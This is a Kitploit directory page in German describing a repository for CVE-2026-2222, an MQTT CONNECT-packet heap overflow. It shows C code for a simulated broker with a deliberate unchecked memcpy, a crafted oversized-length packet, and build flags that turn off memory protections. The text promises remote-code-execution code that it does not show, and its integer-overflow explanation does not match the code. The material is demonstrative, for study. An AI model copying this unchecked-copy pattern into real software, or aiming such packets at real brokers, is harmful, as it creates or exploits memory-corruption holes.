Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/george0papasotiriou/cve-2026-2222-mqtt-broker-connect-packet-heap-overflow
IoT-SicherheitSchwachstellenanalyseExploitationLernen & BildungBinary-Exploitation
GitHubgeorge0papasotiriou/cve-2026-2222-mqtt-broker-connect-packet-heap-overflow

CVE-2026-2222-MQTT-Broker-CONNECT-Packet-Heap-Overflow

Demonstriert den Heap-Überlauf CVE-2026-2222 bei der Verarbeitung von MQTT-CONNECT-Paketen mit einem simulierten verwundbaren Broker und Proof-of-Concept-Exploit-Code für Remote-Codeausführung.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
3vor 1 MonatNoch nicht geprüft

CVE-2026-2222 – Heap-Überlauf im CONNECT-Paket des MQTT-Brokers

Programmcode (C + Python)

root@kitploit:~
// mqtt_broker_sim.c - Simulated vulnerable MQTT broker
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

struct mqtt_connect {
    char protocol_name[8];
    uint8_t protocol_level;
    uint8_t flags;
    uint16_t keepalive;
    // remaining length field misinterpreted
};

void process_connect(uint8_t *packet, size_t len) {
    // Assume we've parsed fixed header: remaining length = (packet[1] & 0x7F) + ...
    // For demo, we read a 2-byte "remaining length" from packet[1:3] and allocate that many bytes,
    // then copy payload without proper bounds.
    uint16_t remaining_length = (packet[1] << 8) | packet[2]; // should be encoded as variable length, but we misuse
    printf("Allocating %d bytes\n", remaining_length);
    char *buffer = malloc(remaining_length); // if remaining_length is crafted to wrap, small allocation
    // copy payload from packet+3 for remaining_length bytes -> heap overflow if remaining_length > len-3
    memcpy(buffer, packet+3, remaining_length); // overflow
    // process...
    free(buffer);
}

int main() {
    // Crafted malicious packet: remaining_length = 0xFFFF (65535) but actual packet size small
    uint8_t evil[] = {0x10, 0xFF, 0xFF, 0x00, 0x04, 'M','Q','T','T'}; // length 9
    process_connect(evil, sizeof(evil));
    return 0;
}

CVE-2026-2222 – Heap-Überlauf im CONNECT-Paket des MQTT-Brokers

Severity: Critical

Übersicht

Ein Integer-Überlauf beim Parsen des Remaining-Length-Felds des MQTT-CONNECT-Pakets führt zu einem Heap-Pufferüberlauf, der Remote-Codeausführung auf dem Broker ermöglicht.

Details zur Schwachstelle

  • Typ: Integer-Überlauf / Heap-Pufferüberlauf
  • Auswirkungen: Remote-Codeausführung auf dem MQTT-Broker, wodurch alle verbundenen IoT-Geräte gefährdet werden.
  • Grundursache: Der Broker dekodiert die Remaining Length als 16‑Bit-Wert und verwendet sie direkt für eine Speicherzuweisung und einen Kopiervorgang, ohne sie gegen die tatsächliche Paketgröße zu prüfen.

Exploit-Demonstration

Kompilieren und Ausführen des simulierten verwundbaren Brokers:

root@kitploit:~
gcc mqtt_broker_sim.c -o mqtt_broker_sim -fno-stack-protector -z execstack
./mqtt_broker_sim
Tool herunterladen